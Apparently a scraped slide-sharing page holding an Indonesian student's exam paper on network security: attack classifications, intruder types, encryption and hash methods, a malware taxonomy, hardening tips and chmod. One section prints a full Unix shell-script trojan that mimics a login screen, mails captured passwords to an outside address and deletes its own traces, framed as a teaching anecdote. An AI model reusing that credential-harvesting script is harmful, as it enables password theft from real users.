6. si & pi. anggri afriani, prof. dr, ir hapzi ali, mm, cma konsep dasar ...Anggriafriani
 
BAB 8 Melindungi Sistem Informasi Perusahaan.pptx
BAB 8 Melindungi Sistem Informasi Perusahaan.pptxBAB 8 Melindungi Sistem Informasi Perusahaan.pptx
BAB 8 Melindungi Sistem Informasi Perusahaan.pptxAjiKTN
 
Sim, wahyudiyanto, hapzi ali, keamanan sistem informasi, universitas mercu bu...
Sim, wahyudiyanto, hapzi ali, keamanan sistem informasi, universitas mercu bu...Sim, wahyudiyanto, hapzi ali, keamanan sistem informasi, universitas mercu bu...
Sim, wahyudiyanto, hapzi ali, keamanan sistem informasi, universitas mercu bu...wahyudiyanto
 

Similar to Sriwahyuni w 1501047 uas_keamananjarkom (20)

552-P01 [Compatibility Mode].pdf
552-P01 [Compatibility Mode].pdf552-P01 [Compatibility Mode].pdf
552-P01 [Compatibility Mode].pdf
 
Modul 1 - Pendahuluan Keamanan Jaringan Komputer
Modul 1 - Pendahuluan Keamanan Jaringan KomputerModul 1 - Pendahuluan Keamanan Jaringan Komputer
Modul 1 - Pendahuluan Keamanan Jaringan Komputer
 
Modul 1
Modul 1Modul 1
Modul 1
 
SIM, Dwi Yuliyanah, Hapzi Ali, Keamanan Sistem Informasi, Universitas Mercu B...
SIM, Dwi Yuliyanah, Hapzi Ali, Keamanan Sistem Informasi, Universitas Mercu B...SIM, Dwi Yuliyanah, Hapzi Ali, Keamanan Sistem Informasi, Universitas Mercu B...
SIM, Dwi Yuliyanah, Hapzi Ali, Keamanan Sistem Informasi, Universitas Mercu B...
 
Sistem keamanan komputer
Sistem keamanan komputerSistem keamanan komputer
Sistem keamanan komputer
 
Ar vol 3_no1_08_list4
Ar vol 3_no1_08_list4Ar vol 3_no1_08_list4
Ar vol 3_no1_08_list4
 
Presentasi modul 12 keamanan komputer
Presentasi modul 12 keamanan komputerPresentasi modul 12 keamanan komputer
Presentasi modul 12 keamanan komputer
 
Modul12
Modul12Modul12
Modul12
 
Presentasi bab 12
Presentasi bab 12Presentasi bab 12
Presentasi bab 12
 
Materi 7-keamanan-komputer-dampak-etika-penanggulangan
Materi 7-keamanan-komputer-dampak-etika-penanggulanganMateri 7-keamanan-komputer-dampak-etika-penanggulangan
Materi 7-keamanan-komputer-dampak-etika-penanggulangan
 
Aspek-Aspek Keamanan Jaringan
Aspek-Aspek Keamanan JaringanAspek-Aspek Keamanan Jaringan
Aspek-Aspek Keamanan Jaringan
 
54d33dc4e4b68.ppt
54d33dc4e4b68.ppt54d33dc4e4b68.ppt
54d33dc4e4b68.ppt
 
Sim,muhamad abud mahasin, hapzi ali, keamanan sistem informasi, universitas m...
Sim,muhamad abud mahasin, hapzi ali, keamanan sistem informasi, universitas m...Sim,muhamad abud mahasin, hapzi ali, keamanan sistem informasi, universitas m...
Sim,muhamad abud mahasin, hapzi ali, keamanan sistem informasi, universitas m...
 
07. SI-PI, Gusti Ketut Suardika, Hapzi Ali, Melindung SI Konsep dan Komponen ...
07. SI-PI, Gusti Ketut Suardika, Hapzi Ali, Melindung SI Konsep dan Komponen ...07. SI-PI, Gusti Ketut Suardika, Hapzi Ali, Melindung SI Konsep dan Komponen ...
07. SI-PI, Gusti Ketut Suardika, Hapzi Ali, Melindung SI Konsep dan Komponen ...
 
6. si & pi. anggri afriani, prof. dr, ir hapzi ali, mm, cma konsep dasar ...
6. si & pi. anggri afriani, prof. dr, ir hapzi ali, mm, cma konsep dasar ...6. si & pi. anggri afriani, prof. dr, ir hapzi ali, mm, cma konsep dasar ...
6. si & pi. anggri afriani, prof. dr, ir hapzi ali, mm, cma konsep dasar ...
 
Tugas pti bab 12
Tugas pti bab 12Tugas pti bab 12
Tugas pti bab 12
 
BAB 8 Melindungi Sistem Informasi Perusahaan.pptx
BAB 8 Melindungi Sistem Informasi Perusahaan.pptxBAB 8 Melindungi Sistem Informasi Perusahaan.pptx
BAB 8 Melindungi Sistem Informasi Perusahaan.pptx
 
Sim, wahyudiyanto, hapzi ali, keamanan sistem informasi, universitas mercu bu...
Sim, wahyudiyanto, hapzi ali, keamanan sistem informasi, universitas mercu bu...Sim, wahyudiyanto, hapzi ali, keamanan sistem informasi, universitas mercu bu...
Sim, wahyudiyanto, hapzi ali, keamanan sistem informasi, universitas mercu bu...
 
Sistem Keamanan Jaringan
Sistem Keamanan JaringanSistem Keamanan Jaringan
Sistem Keamanan Jaringan
 
It komdat 10 keamanan sistem
It komdat 10 keamanan sistemIt komdat 10 keamanan sistem
It komdat 10 keamanan sistem
 

More from Rudi Arif candra

More from Rudi Arif candra (6)

MITIGASI BENCANA
MITIGASI BENCANAMITIGASI BENCANA
MITIGASI BENCANA
 
K map
K mapK map
K map
 
Praktikum rangkaian digital
Praktikum rangkaian digitalPraktikum rangkaian digital
Praktikum rangkaian digital
 
Package akiyo
Package akiyoPackage akiyo
Package akiyo
 
Thesis topics in networking
Thesis topics in networkingThesis topics in networking
Thesis topics in networking
 
1825 4925-1-pb
1825 4925-1-pb1825 4925-1-pb
1825 4925-1-pb
 

Sriwahyuni w 1501047 uas_keamananjarkom

  • 1. Tugas UAS Mata Kuliah ADMISTRASI DAN KEAMANAN JARINGAN KOMPUTER Oleh Sriwahyuni W 1501047 PROGRAM STUDI TEKNIK KOMPUTER POLITEKNIK ACEH SELATAN 2017
  • 2. 1) Menurut David Icove [John D. Howard, “An Analysis Of Security Incidents On The Internet 1989 - 1995,” PhD thesis, Engineering and Public Policy, Carnegie Mellon University, 1997.] berdasarkan lubang keamanan, keamanan dapat diklasifikasikan menjadi empat, yaitu: 1. Keamanan yang bersifat fisik (physical security): termasuk akses orang ke gedung, peralatan, dan media yang digunakan. Contoh :  Wiretapping atau hal-hal yang ber-hubungan dengan akses ke kabel atau komputer yang digunakan juga dapat dimasukkan ke dalam kelas ini.  Denial of service, dilakukan misalnya dengan mematikan peralatan atau membanjiri saluran komunikasi dengan pesan-pesan (yang dapat berisi apa saja karena yang diutamakan adalah banyaknya jumlah pesan).  Syn Flood Attack, dimana sistem (host) yang dituju dibanjiri oleh permintaan sehingga dia menjadi ter-lalu sibuk dan bahkan dapat berakibat macetnya sistem (hang). 2. Keamanan yang berhubungan dengan orang (personel), Contoh :  Identifikasi user (username dan password)  Profil resiko dari orang yang mempunyai akses (pemakai dan pengelola). 3. Keamanan dari data dan media serta teknik komunikasi (communications). 4. Keamanan dalam operasi: Adanya prosedur yang digunakan untuk mengatur dan mengelola sistem keamanan, dan juga ter-masuk prosedur setelah serangan (post attack recovery). [Sumber Referensi Internet : komang_anom.staff.gunadarma.ac.id/Downloads/.../Pertemuan6.pdf] 2) Karakteristik Penyusup : a. The Curious (Si Ingin Tahu) - tipe penyusup ini pada dasarnya tertarik menemukan jenis sistem dan data yang anda miliki. b. The Malicious (Si Perusak) - tipe penyusup ini berusaha untuk merusak sistem anda, atau merubah web page anda, atau sebaliknya membuat waktu dan uang anda kembali pulih. c. The High-Profile Intruder (Si Profil Tinggi) - tipe penyusup ini berusaha menggunakan sistem anda untuk memperoleh popularitas dan ketenaran. Dia mungkin menggunakan sistem profil tinggi anda untuk mengiklankan kemampuannya. d. The Competition (Si Pesaing) - tipe penyusup ini tertarik pada data yang anda miliki dalam sistem anda. Ia mungkin seseorang yang beranggapan bahwa anda memiliki sesuatu yang dapat menguntungkannya secara keuangan atau sebaliknya. [Sumber Referensi : maimunah.ilearning.me/wp-content/.../5/.../pertemuan1.doc.docx]
  • 3. 4) ASPEK KEAMANAN KOMPUTER : Menurut Garfinkel [Simson Garfinkel, “PGP: Pretty Good Privacy,” O’Reilly & Associates, Inc, 1995. ] 1. Privacy / Confidentiality  Defenisi : menjaga informasi dari orang yang tidak berhak mengakses.  Privacy : lebih kearah data-data yang sifatnya privat , Contoh : e-mail seorang pemakai (user) tidak boleh dibaca oleh administrator.  Confidentiality : berhubungan dengan data yang diberikan ke pihak lain untuk keperluan tertentu dan hanya diperbolehkan untuk keperluan tertentu tersebut.  Contoh : data-data yang sifatnya pribadi (seperti nama, tempat tanggal lahir, social security number, agama, status perkawinan, penyakit yang pernah diderita, nomor kartu kredit, dan sebagainya) harus dapat diproteksi dalam penggunaan dan penyebarannya.  Bentuk Serangan : usaha penyadapan (dengan program sniffer).  Usaha-usaha yang dapat dilakukan untuk meningkatkan privacy dan confidentiality adalah dengan menggunakan teknologi kriptografi. 2. Integrity  Defenisi : informasi tidak boleh diubah tanpa seijin pemilik informasi.  Contoh : e-mail di intercept di tengah jalan, diubah isinya, kemudian diteruskan ke alamat yang dituju.  Bentuk serangan : Adanya virus, trojan horse, atau pemakai lain yang mengubah informasi tanpa izin, “man in the middle attack” dimana seseorang menempatkan diri di tengah pembicaraan dan menyamar sebagai orang lain. 3. Authentication  Defenisi : metoda untuk menyatakan bahwa informasi betul-betul asli, atau orang yang mengakses atau memberikan informasi adalah betul-betul orang yang dimaksud.  Dukungan :  Adanya Tools membuktikan keaslian dokumen, dapat dilakukan dengan teknologi watermarking(untuk menjaga “intellectual property”, yaitu dengan menandai dokumen atau hasil karya dengan “tanda tangan” pembuat ) dan digital signature.  Access control, yaitu berkaitan dengan pembatasan orang yang dapat mengakses informasi. User harus menggunakan password, biometric (ciri-ciri khas orang), dan sejenisnya. 4. Availability  Defenisi : berhubungan dengan ketersediaan informasi ketika dibutuhkan.  Contoh hambatan :
  • 4.  “denial of service attack” (DoS attack), dimana server dikirimi permintaan (biasanya palsu) yang bertubi-tubi atau permintaan yang diluar perkiraan sehingga tidak dapat melayani permintaan lain atau bahkan sampai down, hang, crash.  mailbomb, dimana seorang pemakai dikirimi e-mail bertubi-tubi (katakan ribuan e- mail) dengan ukuran yang besar sehingga sang pemakai tidak dapat membuka e- mailnya atau kesulitan mengakses e-mailnya. 5. Access Control  Defenisi : cara pengaturan akses kepada informasi. berhubungan dengan masalah authentication dan juga privacy  Metode : menggunakan kombinasi userid/password atau dengan menggunakan mekanisme lain. 6. Non-repudiation Defenisi : Aspek ini menjaga agar seseorang tidak dapat menyangkal telah melakukan sebuah transaksi. Dukungan bagi electronic commerce. Sumber Referensi : elib.unikom.ac.id/download.php?id=105225 5) Menurut W. Stallings [William Stallings, “Network and Internetwork Security,” Prentice Hall, 1995.] serangan (attack) terdiri dari :  Interruption: Perangkat sistem menjadi rusak atau tidak tersedia. Serangan ditujukan kepada ketersediaan (availability) dari sistem. Contoh serangan adalah “denial of service attack”.  Interception: Pihak yang tidak berwenang berhasil mengakses asset atau informasi. Contoh dari serangan ini adalah penyadapan (wiretapping).  Modification: Pihak yang tidak berwenang tidak saja berhasil mengakses, akan tetapi dapat juga mengubah (tamper) aset. Contoh dari serangan ini antara lain adalah mengubah isi dari web site dengan pesan-pesan yang merugikan pemilik web site.  Fabrication: Pihak yang tidak berwenang menyisipkan objek palsu ke dalam sistem. Contoh dari serangan jenis ini adalah memasukkan pesan-pesan palsu seperti e-mail palsu ke dalam jaringan komputer. [Sumber Referensi E-book, Budi Raharjo.Keamanan Sistem Informasi Berbasis Internet, Hal 13.1999]
  • 5. 6) MEMAHAMI HACKER BEKERJA Secara umum melalui tahapan-tahapan sebagai berikut :  Tahap mencari tahu system komputer sasaran.  Tahap penyusupan  Tahap penjelajahan  Tahap keluar dan menghilangkan jejak. Contoh kasus Trojan House, memanfaatkan SHELL script UNIX Seorang gadis cantik dan genit peserta kuliah UNIX di sebuah perguruan tinggi memiliki potensi memancing pengelola sistem komputer (administrator pemegang account root . . . hmmm) yang lengah. Ia melaporkan bahwa komputer tempat ia melakukan tugas-tugas UNIX yang diberikan tidak dapat dipergunakan. Sang pengelola sistem komputer tentu saja dengan gagah perkasa ingin menunjukkan kekuasaan sebagai administrator UNIX. "Well, ini soal kecil. Mungkin password kamu ke blokir, biar saya perbaiki dari tempat kamu", ujar administrator UNIX sombong sambil duduk disebelah gadis cantik dan genit peserta kuliah tersebut. Keesokan harinya, terjadilah kekacauan di sistem UNIX karena diduga terjadi penyusupan oleh hacker termasuk juga hompepage perguruan tinggi tersebut di-obok-obok, maklum pengelolanya masih sama. Selanjutnya pihak perguruan tinggi mengeluarkan press release bahwa homepage mereka dijebol oleh hacker dari Luar Negeri . . . . hihiii Nah sebenarnya apa sih yang terjadi ? Sederhana, gadis cantik dan genit peserta kuliah UNIX tersebut menggunakan program kecil my_login dalam bentuk shell script yang menyerupai layar login dan password sistem UNIX sebagai berikut: #!/bin/sh ################################### # Nama program : my_login # Deskripsi :Program kuda trojan sederhana # versi 1.0 Nopember 1999 #################################### COUNTER=0 Cat /etc/issue While [ "$COUNTER" –ne 2 ] do let COUNTER=$COIUNTER+1
  • 6. echo "login: c" read LOGIN stty echo echo "password: c" read PASSWORD echo "User $LOGIN : $PASSWORD" | mail gadis@company.com stty echo echo echo "Login Incorrect" done rm $0 kill –9 $PPID Apabila program ini dijalankan maka akan ditampilkan layar login seperti layaknya awal penggunaan komputer pdaa sistem UNIX: Login: Password: Lihatlah, Administrator UNIX yang gagah perkasa tadi yang tidak melihat gadis tersebut menjalankan program ini tentunya tidak sadar bahwa ini merupakan layar tipuan. Layar login ini tidak terlihat beda dibanding layar login sesungguhnya. Seperti pada program login sesungguhnya, sistem komputer akan meminta pemakai untuk login ke dalam sistem. Setelah diisi password dan di enter,maka segera timbul pesan Login:root Password: ******** Login Incorrect Tentu saja Administrator UNIX akan kaget bahwa passwordnya ternyata (seolah-olah) salah. Untuk itu ia segera mengulangi login dan password. Setelah dua kali ia mencoba login dan tidak berhasil, maka loginnya dibatalkan dan kembali keluar UNIX. Perhatikan program di atas baik-baik, sekali pemakai tersebut mencoba login dan mengisi password pada layar di atas, setelah itu maka otomatis data login dan password tersebut akan di email ke mailto:hacker@company.com. Sampai disini maka si gadis lugu dan genit telah mendapatkan login dan password . . . ia ternyata seorang hacker !! Walaupun sederhana, jika kita perhatikan lebih jauh lagi, maka program ini juga memiliki beberapa trik hacker lainnya, yaitu proses penghilangan jejak (masih ingat tahapan hacker yang ditulis di atas ?). Proses ini dilakukan pada 2 baris terakhir dari program my_login di atas, yaitu rm $0
  • 7. kill –9 $PPID yang artinya akan segera dilakukan proses penghapusan program my_login dan hapus pula ID dari proses. Dengan demikian hilanglah program tersebut yang tentunya juga menhilangkan barang bukti. Ditambah lagi penghapusan terhadap jejak proses di dalam sistem UNIX. Zap . . . hilang sudah tanda-tanda bahwa hacker nya ternyata seorang gadis peserta kuliahnya. Sukses dari program ini sebenarnya sangat tergantung dari bagaimana agar aplikasi ini dapat dieksekusi oleh root. Hacker yang baik memang harus berusaha memancing agar pemilik root menjalankan program ini. [Sumber Referensi : fitrimarisa.widyagama.ac.id/wp.../09/keamanan2-HACKER2.doc] 7) Prinsip dasar Perancangan Sistem 1. Mencegah hilangnya data 2. Mencegah masuknya penyusup LAPISAN KEAMANAN : 1. Lapisan Fisik :  membatasi akses fisik ke mesin : o Akses masuk ke ruangan komputer o penguncian komputer secara hardware o keamanan BIOS o keamanan Bootloader  back-up data : o pemilihan piranti back-up o penjadwalan back-up  mendeteksi gangguan fisik :  log file : Log pendek atau tidak lengkap, Log yang berisikan waktu yang aneh, Log dengan permisi atau kepemilikan yang tidak tepat, Catatan pelayanan reboot atau restart, Log yang hilang, masukan su atau login dari tempat yang janggal  mengontrol akses sumber daya. 2. Keamanan lokal Berkaitan dengan user dan hak-haknya :  Beri mereka fasilitas minimal yang diperlukan.
  • 8.  Hati-hati terhadap saat/dari mana mereka login, atau tempat seharusnya mereka login.  Pastikan dan hapus rekening mereka ketika mereka tidak lagi membutuhkan akses. 3. Keamanan Root  Ketika melakukan perintah yang kompleks, cobalah dalam cara yang tidak merusak dulu, terutama perintah yang menggunakan globbing: contoh, anda ingin melakukan "rm foo*.bak", pertama coba dulu: "ls foo*.bak" dan pastikan anda ingin menghapus file-file yang anda pikirkan.  Beberapa orang merasa terbantu ketika melakukan "touch /-i" pada sistem mereka. Hal ini akan membuat perintah-perintah seperti : "rm -fr *" menanyakan apakah anda benar-benar ingin menghapus seluruh file. (Shell anda menguraikan "-i" dulu, dan memberlakukannya sebagai option -i ke rm).  Hanya menjadi root ketika melakukan tugas tunggal tertentu. Jika anda berusaha mengetahui bagaimana melakukan sesuatu, kembali ke shell pemakai normal hingga anda yakin apa yang perlu dilakukan oleh root.  Jalur perintah untuk pemakai root sangat penting. Jalur perintah, atau variabel lingkungan PATH mendefinisikan lokal yang dicari shell untuk program. Cobalah dan batasi jalur perintah bagi pemakai root sedapat mungkin, dan jangan pernah menggunakan '.', yang berarti 'direktori saat ini', dalam pernyataan PATH anda. Sebagai tambahan, jangan pernah menaruh direktori yang dapat ditulis pada jalur pencarian anda, karena hal ini memungkinkan penyerang memodifikasi atau menaruh file biner dalam jalur pencarian anda, yang memungkinkan mereka menjadi root ketika anda menjalankan perintah tersebut.  Jangan pernah menggunakan seperangkat utilitas rlogin/rsh/rexec (disebut utilitas r) sebagai root. Mereka menjadi sasaran banyak serangan, dan sangat berbahaya bila dijalankan sebagai root. Jangan membuat file .rhosts untuk root.  File /etc/securetty berisikan daftar terminal-terminal tempat root dapat login. Secara baku (pada RedHat Linux) diset hanya pada konsol virtual lokal (vty). Berhati-hatilah saat menambahkan yang lain ke file ini. Anda seharusnya login dari jarak jauh sebagai pemakai biasa dan kemudian 'su' jika anda butuh (mudah-mudahan melalui ssh atau saluran terenkripsi lain), sehingga tidak perlu untuk login secara langsung sebagai root.  Selalu perlahan dan berhati-hati ketika menjadi root. Tindakan anda dapat mempengaruhi banyak hal. Pikir sebelum anda mengetik! 4. Keamanan File dan system file  Directory home user tidak boleh mengakses perintah mengubah system seperti partisi, perubahan device dan lain-lain.  Lakukan setting limit system file.  Atur akses dan permission file : read, writa, execute bagi user maupun group.  Selalu cek program-program yang tidak dikenal
  • 9. 5. Keamanan Password dan Enkripsi  Hati-hati terhadap bruto force attack dengan membuat password yang baik.  Selalu mengenkripsi file yang dipertukarkan.  Lakukan pengamanan pada level tampilan, seperti screen saver. 6. Keamanan Kernel  selalu update kernel system operasi.  Ikuti review bugs dan kekurang-kekurangan pada system operasi. 7. Keamanan Jaringan  Waspadai paket sniffer yang sering menyadap port Ethernet.  Lakukan prosedur untuk mengecek integritas data  Verifikasi informasi DNS  Lindungi network file system  Gunakan firewall untuk barrier antara jaringan privat dengan jaringan eksternal [sumber referensi : dhian_sweetania.staff.gunadarma.ac.id/.../Pendahuluan- Keamanan-..] 8) Kriptografi DEFENISI Cryptography adalah suatu ilmu ataupun seni mengamankan pesan, dan dilakukan oleh cryptographer. Cryptanalysis adalah suatu ilmu dan seni membuka (breaking) ciphertext dan orang yang melakukannya disebut cryptanalyst. ELEMEN CRYPTOSYSTEM Cryptographic system atau cryptosystem adalah suatu fasilitas untuk mengkonversikan plaintext ke ciphertext dan sebaliknya. Dalam sistem ini, seperangkat parameter yang
  • 10. menentukan transformasi pencipheran tertentu disebut suatu set kunci. Proses enkripsi dan dekripsi diatur oleh satu atau beberapa kunci kriptografi. [sumber referensi Buku Kriptografi Rinaldi Munir, Penerbit informatika Bandung.] 9) Metode Enkripsi Enkripsi adalah proses mengamankan suatu informasi dengan membuat informasi tersebut tidak dapat dibaca tanpa bantuan pengetahuan khusus. Dikarenakan enkripsi telah digunakan untuk mengamankan komunikasi di berbagai negara, hanya organisasi-organisasi tertentu dan individu yang memiliki kepentingan yang sangat mendesak akan kerahasiaan yang menggunakan enkripsi. Di pertengahan tahun 1970-an, enkripsi kuat dimanfaatkan untuk pengamanan oleh sekretariat agen pemerintah Amerika Serikat pada domain publik, dan saat ini enkripsi telah digunakan pada sistem secara luas, seperti Internet e- commerce, jaringan Telepon bergerak dan ATM pada bank. Enkripsi dapat digunakan untuk tujuan keamanan, tetapi teknik lain masih diperlukan untuk membuat komunikasi yang aman, terutama untuk memastikan integritas dan autentikasi dari sebuah pesan. Contohnya, Message Authentication Code (MAC) atau digital signature. Penggunaan yang lain yaitu untuk melindungi dari analisis jaringan komputer. Dekripsi adalah proses mentranslasikan informasi yang diterima dengan pengetahuan khusus dari sumber. Metode Enkripsi:  Metode Enkripsi MD2 Message-Digest algortihm 2 (MD2) adalah fungsi hash cryptographic yang dikembangkan oleh Ronald Rivest pada tahun 1989. Algoritma dioptimalkan untuk komputer 8-bit. MD2 yang ditetapkan dalam RFC 1319. Meskipun algoritma lainnya telah diusulkan sejak dulu, seperti MD4, MD5 dan SHA, bahkan sampai dengan 2004 [update] MD2 tetap digunakan dalam infrastruktur kunci publik sebagai bagian dari sertifikat yang dihasilkan dengan MD2 dan RSA.  Metode Enkripsi MD4 Message-Digest algortihm 4(seri ke-4) yang dirancang oleh Profesor Ronald Rivest dari MIT pada tahun 1990. Panjangnya adalah 128 bit. MD4 juga digunakan untuk menghitung NT-hash ringkasan password pada Microsoft Windows NT, XP dan Vista.  Metode Enkripsi MD5 MD5 adalah salah satu dari serangkaian algortima message digest yang didesain oleh Profesor Ronald Rivest dari MIT (Rivest, 1994). Saat kerja analitik menunjukkan bahwa pendahulu MD5 yaitu MD4 mulai tidak aman, MD5 kemudian didesain pada tahun 1991 sebagai pengganti dari MD4 (kelemahan MD4 ditemukan oleh Hans Dobbertin). Dalam kriptografi, MD5 (Message-Digest algortihm 5) ialah fungsi hash kriptografik yang digunakan secara luas dengan hash value 128-bit. Pada standart Internet (RFC 1321), MD5 telah dimanfaatkan secara bermacam-
  • 11. macam pada aplikasi keamanan, dan MD5 juga umum digunakan untuk melakukan pengujian integritas sebuah file.  Metode Enkripsi SHA SHA adalah serangkaian fungsi cryptographic hash yang dirancang oleh National Security Agency (NSA) dan diterbitkan oleh NIST sebagai US Federal Information Processing Standard. SHA adalah Secure Hash Algoritma. Jenis-jenis SHA yaitu SHA-0, SHA-1, dan SHA-2. Untuk SHA-2 menggunakan algoritma yang identik dengan ringkasan ukuran variabel yang terkenal sebagai SHA-224, SHA-256, SHA-384, dan SHA-512.  Metode Enkripsi RC4 RC4 merupakan salah satu jenis stream cipher, yaitu memproses unit atau input data pada satu saat. Unit atau data pada umumnya sebuah byte atau bahkan kadang kadang bit (byte dalam hal RC4). Dengan cara ini enkripsi atau dekripsi dapat dilaksanakan pada panjang yang variabel. RC4 adalah penyandian stream cipher yang dibuat oleh Ron Riverst pada tahun 1987 untuk pengamanan RSA. Algoritmanya didasarkan pada permutasi acak.  Metode Enkripsi Base64 Base64 adalah sistem untuk mewakili data mentah byte sebagai karakter ASCII. Base64 menyediakan 6-bit encoding 8-bit ASCII karakter. Base64 merupakan format yang dicetak menggunakan karakter, memungkinkan binari data yang akan dikirim dalam bentuk dan email, dan akan disimpan di database atau file. [sumber referensi : http://safirmas.web.ugm.ac.id/2016/10/23/metode-enkripsi-dan-dekripsi/] 10) KLASIFIKASI Devil Program Taksonomi ancaman perangkat lunak / klasifikasi program jahat (malicious program): a) Program-program yang memerlukan program inang (host program). Fragmen program tidak dapat mandiri secara independen dari suatu program aplikasi, program utilitas atau program sistem. b) Program-program yang tidak memerlukan program inang. Program sendiri yang dapat dijadwalkan dan dijalankan oleh sistem operasi. Tipe-tipe program jahat : a) Bacteria : program yang mengkonsumsi sumber daya sistem dengan mereplikasi dirinya sendiri. Bacteria tidak secara eksplisit merusak file. Tujuan program ini hanya satu yaitu mereplikasi dirinya. Program bacteria yang sederhana bisa hanya mengeksekusi dua kopian dirinya secara simultan pada sistem multiprogramming atau
  • 12. menciptakan dua file baru, masing-masing adalah kopian file program bacteria. Kedua kopian in kemudian mengkopi dua kali, dan seterusnya b) Logic bomb : logik yang ditempelkan pada program komputer agar memeriksa suatu kumpulan kondisi di sistem. Ketika kondisi-kondisi yang dimaksud ditemui, logik mengeksekusi suatu fungsi yang menghasilkan aksi-aksi tak diotorisasi. c) Trapdoor : Titik masuk tak terdokumentasi rahasia di satu program untuk memberikan akses tanpa metode-metode otentifikasi normal d) Trojan horse : Rutin tak terdokumentasi rahasia ditempelkan dalam satu program berguna. Program yang berguna mengandung kode tersembunyi yang ketika dijalankan melakukan suatu fungsi yang tak diinginkan. Eksekusi program menyebabkan eksekusi rutin rahasia ini. e) Virus : Kode yang ditempelkan dalam satu program yang menyebabkan pengkopian dirinya disisipkan ke satu program lain atau lebih, dengan cara memodifikasi program-program itu. f) Worm : Program yang dapat mereplikasi dirinya dan mengirim kopian-kopian dari komputer ke komputer lewat hubungan jaringan. Begitu tiba, worm diaktifkan untuk mereplikasi dan progasai kembali. Selain hanya propagasi, worm biasanya melakukan fungsi yang tak diinginkan. [sumber referensi : reza_chan.staff.gunadarma.ac.id/.../P3+-+Ancaman+Sistem+Keama.] 11) Keamanan Sistem Operasi Tujuan Sistem Operasi: mengontrol akses share dan mengimplementasikan interface untuk membeolehkan akses tersebut. Selain tujuan itu adalah dukungan aktifitas- aktifitas seperti identifikasi dan authentication, naming, penyimpanan objek, penjadwalan, komunikasi antar proses, dan reclaiming serta reusing suatu objek. Fungsi-fungsi sistem operasi dikategorikan menjadi:  Kontrol akses  Manajemen identitas dan kepercayaan (credential)  Alir informasi  Perlindungan audit dan integritas Beberapa aspek system computer yang membutuhkan perlindungan :  Memory  Peralatan I/O yang dapat dibagi pakai misalnya Disk  Peralatan I/O serial seperti printer dan drive tape  Program yang dapat dibagi pakai dan subprosedur  Jaringan  Data yang dibagi(share) [Sumber referensi: aldi_tob_2000.staff.gunadarma.ac.id/.../Materi+Keamanan+Kompu..] 12) Skema Chmode
  • 13. Chmod merupakan sebuah perintah yang digunakan untuk menambah (+) dan mengurangi (-) ijin pemakai untuk mengakses file atau direktori. Misalkan kita memiliki file sebagai berikut jika dilihat dengan perintah ls -l -rwxrw-r-- 1 iqbal pembega 68 Sep 28 01:39 ini-file.txt Keterangan: -rwxrw-r-- 1 iqbal pembega 68 Sep 28 01:39 ini-file.txt - karakter pertama “-” yang menjelaskan bahwa ini ada sebuah file, jika di mulai dengan “d” maka ini adalah direktori/folder. rwx 3 karakter berikutnya, hak akses user yang memiliki file ini, dimana pada kasus ini pemilik file mendapatkan hak untuk read, write dan execute. rw- 3 karakter berikutnya, hak akses suatu group pada file ini, dimana pada kasus ini group mendapatkan hak untuk read dan write tanpa execute. r-- 3 karakter berikutnya, hak akses untuk "others" (user lainnya). “Others” hanya bisa membaca file ini. 1 jumlah sortcut / link yang menuju ke file ini. iqbal nama pemilik file ini. pembega group yang memiliki file ini. 68 ukuran file dalam blok. Sep 28 01:39 waktu yang menunjukan kapan file ini di buat / dimodifikasi. ini-file.txt nama file. [sumber referensi : http://pembega.blogspot.co.id/2014/10/perintah-chown-chgrp-dan-chmod-di- linux.html]